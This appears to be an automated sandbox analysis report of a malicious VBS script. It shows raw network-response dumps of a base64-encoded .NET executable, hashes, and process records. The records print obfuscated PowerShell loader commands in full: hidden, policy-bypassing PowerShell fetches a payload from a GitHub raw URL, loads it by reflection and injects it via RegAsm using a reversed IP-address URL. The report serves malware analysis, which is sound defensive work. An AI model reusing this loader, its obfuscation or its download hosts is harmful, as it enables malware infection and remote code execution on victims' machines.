                            X-Cache: MISS
                            X-Cache-Hits: 0
                            X-Timer: S1727839327.163872,VS0,VE122
                            Vary: Authorization,Accept-Encoding,Origin
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Fastly-Request-ID: 09033090b158bf463412ab01d6ffb676867e6a19
                            Expires: Wed, 02 Oct 2024 03:27:07 GMT
                            Source-Age: 0
                            2024-10-02 03:22:07 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                            2024-10-02 03:22:07 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                            Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                            2024-10-02 03:22:07 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                            Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                            2024-10-02 03:22:07 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                            Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                            2024-10-02 03:22:07 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                            Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                            2024-10-02 03:22:07 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                            Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                            2024-10-02 03:22:07 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                            Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                            2024-10-02 03:22:07 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                            Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                            2024-10-02 03:22:07 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                            Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                            2024-10-02 03:22:07 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                            Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:23:22:02
                            Start date:01/10/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs"
                            Imagebase:0x7ff70d000000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:23:22:03
                            Start date:01/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:23:22:03
                            Start date:01/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:23:22:04
                            Start date:01/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >
                              Memory Dump Source
                              • Source File: 00000002.00000002.1842562352.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7ffaac570000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                              • Instruction ID: 809da6946533ce9c2d371a9dad8a613a608cd3ad304bdd222e800b692fd392a5
                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                              • Instruction Fuzzy Hash: 2D01A77010CB0D8FD748EF0CE051AA6B7E0FB85324F10052DE58AC3661DB36E882CB41
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26602c03d0dc9b65dee95d15c7e8c1b583be60c02e19678c0049dd90383933af
                              • Instruction ID: fdfbf25c6e91c39df57e7384390d7136e733a20e881f411b224f4ff052c42d1b
                              • Opcode Fuzzy Hash: 26602c03d0dc9b65dee95d15c7e8c1b583be60c02e19678c0049dd90383933af
                              • Instruction Fuzzy Hash: 4532E262A0EBCA8FF796DB6848655657FE0EF57210B08A1FBD04DCB293D9189C0D8391
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd0761c0ef990e79485d5aa83007c663b336f1982abe3c488837c1ccd70b04aa
                              • Instruction ID: 7da695209c35c8b4089f185567a2b8c18a442d22b66349d2fda6880519e3f153
                              • Opcode Fuzzy Hash: dd0761c0ef990e79485d5aa83007c663b336f1982abe3c488837c1ccd70b04aa
                              • Instruction Fuzzy Hash: AA12E46290EBC68FE797DB2888555603FE1EF57210B1891FED08DCB2E3D919D80AC791
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 259ec659058435b77e45c43f1936ecbe5a5ed5a1e8fbc537110e9eac0d72d85f
                              • Instruction ID: 765cfb6130699baef792927ff316560c9ffeaa00741da7551fd1a02397eeebae
                              • Opcode Fuzzy Hash: 259ec659058435b77e45c43f1936ecbe5a5ed5a1e8fbc537110e9eac0d72d85f
                              • Instruction Fuzzy Hash: A5022362A0EBCA8FF796D76C88555B57FE0EF56210B08A1FAD04DCB193D918D80AC391
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7719c1ed90f5c1ef7d8119c3d6b18391759a21218f4bb9f6ef64557ac8d854f2
                              • Instruction ID: ec3d6f2f5896b9ea259b153e45d6c8a14a4e9954460d1576342dae2744b7d3f4
                              • Opcode Fuzzy Hash: 7719c1ed90f5c1ef7d8119c3d6b18391759a21218f4bb9f6ef64557ac8d854f2
                              • Instruction Fuzzy Hash: CCF1E37190E7C98FE75ADB2888556643FE1EF47210F09A1FAD04DCB293DA29E849C7C1
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 10a91d084c7c3b8b943fb4768a7ae0cfd2fceab6e78ed953bab8bbd008f5051b
                              • Instruction ID: 5d6d5a3167bd18b3cfcb4125fc287cc053b9e10e8c0468be72c3896ffe03ae4a
                              • Opcode Fuzzy Hash: 10a91d084c7c3b8b943fb4768a7ae0cfd2fceab6e78ed953bab8bbd008f5051b
                              • Instruction Fuzzy Hash: D3612566A0EBC78FFB96D76818116F966C1EF9A250B1C60BBD10EC73D3DD08D80982C1
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d07e374c0236a75ba0dbb72bc88561d711c0ba37a80ae113d15b36a42b060f2
                              • Instruction ID: a8c32cff33c46ba2a2477f4b46227463ff57700427b2492cb22d178e30c0b8d6
                              • Opcode Fuzzy Hash: 8d07e374c0236a75ba0dbb72bc88561d711c0ba37a80ae113d15b36a42b060f2
                              • Instruction Fuzzy Hash: 4351C13191EBCE8BFB99DB0884056767BE1FF46304F54A279E40D83282DE25EC4D86C1
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 570948fd979e2fb073ddb70f7410737c3b0ddec4035600820126ed53d903a1e5
                              • Instruction ID: 78a1f766e650bc0bdde109481665080078c3046c30b6def6a229424d5875c629
                              • Opcode Fuzzy Hash: 570948fd979e2fb073ddb70f7410737c3b0ddec4035600820126ed53d903a1e5
                              • Instruction Fuzzy Hash: 8F51DA22A0EBCA8FF796DB2844656747BE0EF56210F4961FAD04DCB293E918DC0DC391
                              Memory Dump Source
                              • Source File: 00000004.00000002.1823043894.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac630000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7d9e443ed3d5b5cb8bd88c0b87dc3ede8e8ccb2d7f09b815829e5f27b7c419f
